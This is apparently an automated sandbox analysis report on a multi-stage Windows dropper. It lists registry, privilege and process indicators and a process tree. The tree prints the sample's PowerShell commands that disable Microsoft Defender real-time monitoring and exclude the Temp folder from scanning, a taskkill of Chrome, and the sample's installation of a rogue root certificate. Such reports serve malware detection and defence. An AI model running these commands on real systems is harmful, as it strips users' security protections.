Processes:

Fri2050c5d6de57ca396.exeFri20070cd68c3181d0.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\15BD989BA25C289121248085854837DE1839E769	Fri2050c5d6de57ca396.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\15BD989BA25C289121248085854837DE1839E769\Blob = 0f000000010000002000000001911ffa1b6a4e370db592f347b413c11190fb06c8edc7d2c64ce91a2d5419a003000000010000001400000015bd989ba25c289121248085854837de1839e7692000000001000000f9020000308202f5308201dda00302010202106fb8d1e873e008b93443cf50cc69c029300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3231313130353031303030305a170d3236313130343031303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100b223b6dbb4922255e91270dc275bddd46a849474b1154a386ad965882236a09a4d99af1f1b917459b62dc24942cee02864f76fbdc8107d730da7fd6d4df06f5129452f519c2f11ca4e15d9eb23eada0d2897ea16ad85fc173d1ae69b4e72066d6626954a5965ed47d244de77033feb1c4acf4ec5b2c3b1505b4678191326123408d3ed5ac430b047c755c20cd31f271b17e3a6f367c5846b88db35ca0c6e6328d659442c0578da800fa67fbe2dbc30aa61c04aed3c3a20454d40451415fa485cf216aba1f6a35284a00efe5176f8f3ef18310f6b454ef3c8fef0ea54b11636d8e47ec892927fa4cb72e454a660a3fa31c1600999aa2bf744ba2091e1dfede3750203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e04160414cad5f7acbbd5a3c7e8a9c190fbd81d3196e8585c300d06092a864886f70d01010b05000382010100636107c725ddc11e29d5291ac4ea83f7d6ab9ef01e67d84fcbabef186fb38b55632b64292bdf6bfeb9e6d722f0763dfc8737d63d119da9b80433153e4e24ab4db29ba67b411a4902ea7b960ab17b15df0691642539c8a479a3473e03cd30ef1fa0d26c9088ce0815e2f86d9ca6444b34fa5662cab523ce009b840e428d3f056c815f058d7c755c8094f6922df5f31d11187e3abf61386b8296c02cdfb7ea7ca23c193844eb9caecc46e291be0d32e8b2d00345a78537bc317e631d2bffc0157ba3a31b6b3ed2f4d2b405fdadc13414ebb5449258934af041b8da2c08ed0f85ddd275f7c587aa93adaadb4fec1e0324f7a318d73a9a9fab23adc48cd9a308f5d9	Fri2050c5d6de57ca396.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\15BD989BA25C289121248085854837DE1839E769\Blob = 140000000100000014000000cad5f7acbbd5a3c7e8a9c190fbd81d3196e8585c03000000010000001400000015bd989ba25c289121248085854837de1839e7690f000000010000002000000001911ffa1b6a4e370db592f347b413c11190fb06c8edc7d2c64ce91a2d5419a02000000001000000f9020000308202f5308201dda00302010202106fb8d1e873e008b93443cf50cc69c029300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3231313130353031303030305a170d3236313130343031303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100b223b6dbb4922255e91270dc275bddd46a849474b1154a386ad965882236a09a4d99af1f1b917459b62dc24942cee02864f76fbdc8107d730da7fd6d4df06f5129452f519c2f11ca4e15d9eb23eada0d2897ea16ad85fc173d1ae69b4e72066d6626954a5965ed47d244de77033feb1c4acf4ec5b2c3b1505b4678191326123408d3ed5ac430b047c755c20cd31f271b17e3a6f367c5846b88db35ca0c6e6328d659442c0578da800fa67fbe2dbc30aa61c04aed3c3a20454d40451415fa485cf216aba1f6a35284a00efe5176f8f3ef18310f6b454ef3c8fef0ea54b11636d8e47ec892927fa4cb72e454a660a3fa31c1600999aa2bf744ba2091e1dfede3750203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e04160414cad5f7acbbd5a3c7e8a9c190fbd81d3196e8585c300d06092a864886f70d01010b05000382010100636107c725ddc11e29d5291ac4ea83f7d6ab9ef01e67d84fcbabef186fb38b55632b64292bdf6bfeb9e6d722f0763dfc8737d63d119da9b80433153e4e24ab4db29ba67b411a4902ea7b960ab17b15df0691642539c8a479a3473e03cd30ef1fa0d26c9088ce0815e2f86d9ca6444b34fa5662cab523ce009b840e428d3f056c815f058d7c755c8094f6922df5f31d11187e3abf61386b8296c02cdfb7ea7ca23c193844eb9caecc46e291be0d32e8b2d00345a78537bc317e631d2bffc0157ba3a31b6b3ed2f4d2b405fdadc13414ebb5449258934af041b8da2c08ed0f85ddd275f7c587aa93adaadb4fec1e0324f7a318d73a9a9fab23adc48cd9a308f5d9	Fri2050c5d6de57ca396.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\15BD989BA25C289121248085854837DE1839E769\Blob = 1900000001000000100000009071b6e8e31bda9182ec7e07151db33b0f000000010000002000000001911ffa1b6a4e370db592f347b413c11190fb06c8edc7d2c64ce91a2d5419a003000000010000001400000015bd989ba25c289121248085854837de1839e769140000000100000014000000cad5f7acbbd5a3c7e8a9c190fbd81d3196e8585c2000000001000000f9020000308202f5308201dda00302010202106fb8d1e873e008b93443cf50cc69c029300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3231313130353031303030305a170d3236313130343031303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100b223b6dbb4922255e91270dc275bddd46a849474b1154a386ad965882236a09a4d99af1f1b917459b62dc24942cee02864f76fbdc8107d730da7fd6d4df06f5129452f519c2f11ca4e15d9eb23eada0d2897ea16ad85fc173d1ae69b4e72066d6626954a5965ed47d244de77033feb1c4acf4ec5b2c3b1505b4678191326123408d3ed5ac430b047c755c20cd31f271b17e3a6f367c5846b88db35ca0c6e6328d659442c0578da800fa67fbe2dbc30aa61c04aed3c3a20454d40451415fa485cf216aba1f6a35284a00efe5176f8f3ef18310f6b454ef3c8fef0ea54b11636d8e47ec892927fa4cb72e454a660a3fa31c1600999aa2bf744ba2091e1dfede3750203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e04160414cad5f7acbbd5a3c7e8a9c190fbd81d3196e8585c300d06092a864886f70d01010b05000382010100636107c725ddc11e29d5291ac4ea83f7d6ab9ef01e67d84fcbabef186fb38b55632b64292bdf6bfeb9e6d722f0763dfc8737d63d119da9b80433153e4e24ab4db29ba67b411a4902ea7b960ab17b15df0691642539c8a479a3473e03cd30ef1fa0d26c9088ce0815e2f86d9ca6444b34fa5662cab523ce009b840e428d3f056c815f058d7c755c8094f6922df5f31d11187e3abf61386b8296c02cdfb7ea7ca23c193844eb9caecc46e291be0d32e8b2d00345a78537bc317e631d2bffc0157ba3a31b6b3ed2f4d2b405fdadc13414ebb5449258934af041b8da2c08ed0f85ddd275f7c587aa93adaadb4fec1e0324f7a318d73a9a9fab23adc48cd9a308f5d9	Fri2050c5d6de57ca396.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Fri20070cd68c3181d0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Fri20070cd68c3181d0.exe

Script User-Agent 9 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	48	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	64	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	95	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	118	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	38	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	68	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Fri2060e5abb4.exeFri20a252fe0d.exepowershell.exepowershell.exe

pid	process
1836	Fri2060e5abb4.exe
1836	Fri2060e5abb4.exe
1448	Fri20a252fe0d.exe
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1364	powershell.exe
1648	powershell.exe
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396
1396

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

Fri2060e5abb4.exe

pid process

1836 Fri2060e5abb4.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

Fri20070cd68c3181d0.exeFri20dd1f5f1511478e4.exeFri2064de6352.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exeFri2058e26838.exeFri207a27f7f543e5fe.exeFri2002bea00b158d.exe

description	pid	process
Token: SeCreateTokenPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeAssignPrimaryTokenPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeLockMemoryPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeIncreaseQuotaPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeMachineAccountPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeTcbPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeSecurityPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeTakeOwnershipPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeLoadDriverPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeSystemProfilePrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeSystemtimePrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeProfSingleProcessPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeIncBasePriorityPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeCreatePagefilePrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeCreatePermanentPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeBackupPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeRestorePrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeShutdownPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeDebugPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeAuditPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeSystemEnvironmentPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeChangeNotifyPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeRemoteShutdownPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeUndockPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeSyncAgentPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeEnableDelegationPrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeManageVolumePrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeImpersonatePrivilege	1712	Fri20070cd68c3181d0.exe
Token: SeCreateGlobalPrivilege	1712	Fri20070cd68c3181d0.exe
Token: 31	1712	Fri20070cd68c3181d0.exe
Token: 32	1712	Fri20070cd68c3181d0.exe
Token: 33	1712	Fri20070cd68c3181d0.exe
Token: 34	1712	Fri20070cd68c3181d0.exe
Token: 35	1712	Fri20070cd68c3181d0.exe
Token: SeShutdownPrivilege	1396
Token: SeShutdownPrivilege	1396
Token: SeShutdownPrivilege	1396
Token: SeShutdownPrivilege	1396
Token: SeDebugPrivilege	1848	Fri20dd1f5f1511478e4.exe
Token: SeDebugPrivilege	1472	Fri2064de6352.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeDebugPrivilege	2876	taskkill.exe
Token: SeShutdownPrivilege	1396
Token: SeDebugPrivilege	2484	taskkill.exe
Token: SeShutdownPrivilege	1396
Token: SeShutdownPrivilege	1396
Token: SeDebugPrivilege	2164	taskkill.exe
Token: SeDebugPrivilege	1984	Fri2058e26838.exe
Token: SeImpersonatePrivilege	1984	Fri2058e26838.exe
Token: SeDebugPrivilege	2980	Fri207a27f7f543e5fe.exe
Token: SeShutdownPrivilege	1396
Token: SeShutdownPrivilege	1396
Token: SeShutdownPrivilege	1396
Token: SeDebugPrivilege	2748	Fri2002bea00b158d.exe
Token: SeShutdownPrivilege	1396

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

iexplore.exeFri20405c77f8562ea6.tmp

pid process

1396
1396
2916 iexplore.exe
2400 Fri20405c77f8562ea6.tmp
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

pid process

1396
1396
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

2916 iexplore.exe
2916 iexplore.exe
2308 IEXPLORE.EXE
2308 IEXPLORE.EXE

pid	process
1396
1396
2916	iexplore.exe
2400	Fri20405c77f8562ea6.tmp

pid	process
1396
1396

pid	process
2916	iexplore.exe
2916	iexplore.exe
2308	IEXPLORE.EXE
2308	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.exe

description	pid	process	target process
PID 1472 wrote to memory of 1656	1472	setup_x86_x64_install.exe	setup_installer.exe
PID 1472 wrote to memory of 1656	1472	setup_x86_x64_install.exe	setup_installer.exe
PID 1472 wrote to memory of 1656	1472	setup_x86_x64_install.exe	setup_installer.exe
PID 1472 wrote to memory of 1656	1472	setup_x86_x64_install.exe	setup_installer.exe
PID 1472 wrote to memory of 1656	1472	setup_x86_x64_install.exe	setup_installer.exe
PID 1472 wrote to memory of 1656	1472	setup_x86_x64_install.exe	setup_installer.exe
PID 1472 wrote to memory of 1656	1472	setup_x86_x64_install.exe	setup_installer.exe
PID 1656 wrote to memory of 1816	1656	setup_installer.exe	setup_install.exe
PID 1656 wrote to memory of 1816	1656	setup_installer.exe	setup_install.exe
PID 1656 wrote to memory of 1816	1656	setup_installer.exe	setup_install.exe
PID 1656 wrote to memory of 1816	1656	setup_installer.exe	setup_install.exe
PID 1656 wrote to memory of 1816	1656	setup_installer.exe	setup_install.exe
PID 1656 wrote to memory of 1816	1656	setup_installer.exe	setup_install.exe
PID 1656 wrote to memory of 1816	1656	setup_installer.exe	setup_install.exe
PID 1816 wrote to memory of 876	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 876	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 876	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 876	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 876	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 876	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 876	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1488	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1488	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1488	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1488	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1488	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1488	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1488	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1500	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1500	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1500	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1500	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1500	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1500	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1500	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1744	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1744	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1744	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1744	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1744	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1744	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1744	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1780	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1780	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1780	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1780	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1780	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1780	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1780	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1628	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1628	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1628	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1628	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1628	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1628	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1628	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1636	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1636	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1636	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1636	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1636	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1636	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1636	1816	setup_install.exe	cmd.exe
PID 1816 wrote to memory of 1368	1816	setup_install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1472
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Users\Admin\AppData\Local\Temp\7zS87682406\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS87682406\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      PID:876
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1648
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:1488
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1364
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri20bc562fa6acd.exe
      4⤵
      Loads dropped DLL
      PID:1500
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20bc562fa6acd.exe
        
        Fri20bc562fa6acd.exe
        5⤵
        Executes dropped EXE
        
        PID:696
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri20070cd68c3181d0.exe
      4⤵
      Loads dropped DLL
      PID:1744
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20070cd68c3181d0.exe
        
        Fri20070cd68c3181d0.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:1712
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:1160
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2164
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri2050c5d6de57ca396.exe
      4⤵
      Loads dropped DLL
      PID:1780
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2050c5d6de57ca396.exe
        
        Fri2050c5d6de57ca396.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1108
      - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2050c5d6de57ca396.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2050c5d6de57ca396.exe" -u
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:1680
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri20a252fe0d.exe
      4⤵
      Loads dropped DLL
      PID:1628
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20a252fe0d.exe
        
        Fri20a252fe0d.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1448
      - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=Fri20a252fe0d.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.0
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:2916
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2916 CREDAT:275457 /prefetch:2
        7⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2308
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2916 CREDAT:4142088 /prefetch:2
        7⤵
        
        PID:2612
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2916 CREDAT:603153 /prefetch:2
        7⤵
        
        PID:2328
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2916 CREDAT:275484 /prefetch:2
        7⤵
        
        PID:1488
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2916 CREDAT:865326 /prefetch:2
        7⤵
        
        PID:3128
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri20405c77f8562ea6.exe
      4⤵
      Loads dropped DLL
      PID:1636
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20405c77f8562ea6.exe
        
        Fri20405c77f8562ea6.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1764
      - C:\Users\Admin\AppData\Local\Temp\is-BJSR3.tmp\Fri20405c77f8562ea6.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BJSR3.tmp\Fri20405c77f8562ea6.tmp" /SL5="$10162,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20405c77f8562ea6.exe"
        6⤵
        Executes dropped EXE
        
        PID:1732
        
        C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20405c77f8562ea6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20405c77f8562ea6.exe" /SILENT
        7⤵
        Executes dropped EXE
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\is-ILQU1.tmp\Fri20405c77f8562ea6.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-ILQU1.tmp\Fri20405c77f8562ea6.tmp" /SL5="$101C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20405c77f8562ea6.exe" /SILENT
        8⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\is-43LQM.tmp\winhostdll.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-43LQM.tmp\winhostdll.exe" ss1
        9⤵
        Executes dropped EXE
        
        PID:2472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri2002bea00b158d.exe
      4⤵
      Loads dropped DLL
      PID:1368
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2002bea00b158d.exe
        
        Fri2002bea00b158d.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1000
      - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2002bea00b158d.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2002bea00b158d.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2748
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri2064de6352.exe
      4⤵
      Loads dropped DLL
      PID:1064
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2064de6352.exe
        
        Fri2064de6352.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri2000bef28b4.exe
      4⤵
      Loads dropped DLL
      PID:2004
